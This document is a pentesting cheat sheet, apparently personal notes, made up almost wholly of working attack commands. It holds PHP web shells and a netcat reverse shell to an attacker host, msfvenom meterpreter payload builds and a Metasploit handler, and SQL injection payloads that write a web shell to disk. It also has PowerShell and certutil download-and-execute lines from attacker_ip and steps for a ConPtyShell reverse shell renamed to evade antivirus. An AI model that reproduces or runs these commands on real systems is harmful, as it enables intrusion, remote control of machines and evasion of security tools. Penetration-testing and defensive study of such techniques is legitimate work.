
-----------------------------------------------------

PHP
<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>

#Simple php revers shell.  -e option if you don't have a working /bin/sh. -c string specify shell commands to exec after connect


<?php
system('nc.exe -e cmd.exe attacker_ip 4444')
?>

-----------------------------------------------------
Reverse Shell 

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 

https://www.revshells.com/

-----------------------------------------------------

Msfvenom
#Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f elf > shell.elf
# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f asp > shell.asp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f war > shell.war
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.jsp
# Exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=445 -f exe -o shell_reverse.exe



msfvenom -p windows/x64/reverse_tcp --platform windows -a x86 -f exe lhost=192.168.1.101 lport=4444 -a /root/somewhere/hack.exe

msfpayload windows/x64/meterpreter_tcp lhost=192.168.1.101 lport=4444 x > /root/somewhere/hack.exe
use exploit/multi/handler
set payload windows/x64/meterpreter_tcp
set lhost 192.168.1.101
se lport 4444
show targets
set target x
run
-----------------------------------------------------

Interactive TTY Shell
# python
python -c 'import pty; pty.spawn("/bin/sh")'
# Echo
echo 'os.system('/bin/bash')'
# sh
/bin/sh -i
# bash
/bin/bash -i

-----------------------------------------------------

Shell From SQL Injection
# windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

---------------------------------------------------------

Misc
# Method of copying a file on windows mashine|
                                   
IEX(New-Object Net.WebClient).downloadstring(\"http://attacker_ip/shell.ps1\")
iwr -UseBasicParsing -Uri http://attacker_ip/pr.exe OutFile 'the_path_where_you_want_to_store_your_pr.exe'
certutil -urlcache -split -f http://attacker_ip


# Revers shell on on windows server.

On server do below:
5. IEX(New-Object Net.WebClient).downloadString("http://10.10.10.10/rev.ps1")
6. run hackerzzz 10.10.10.10

On attacker side:

1. Download reverse shell ConPtyShell(in this shell find and rename Invoke-ConPtyShell into hackerzzz as AV will detect this file, also rename any ConPtyShell to hackerzzz)
2. Name it as rev.ps1
3. Run local Simple http server and copy in www this rev.ps1
4. Also run stty raw -echo; (stty size; cat) | nc -lvnp 9001

then from reversshell's console type: wget http://10.10.10.10/winpeas.exe  for local enumeration

Any questions look for acute for ippsec.rocks.

--------------------------------------------------------
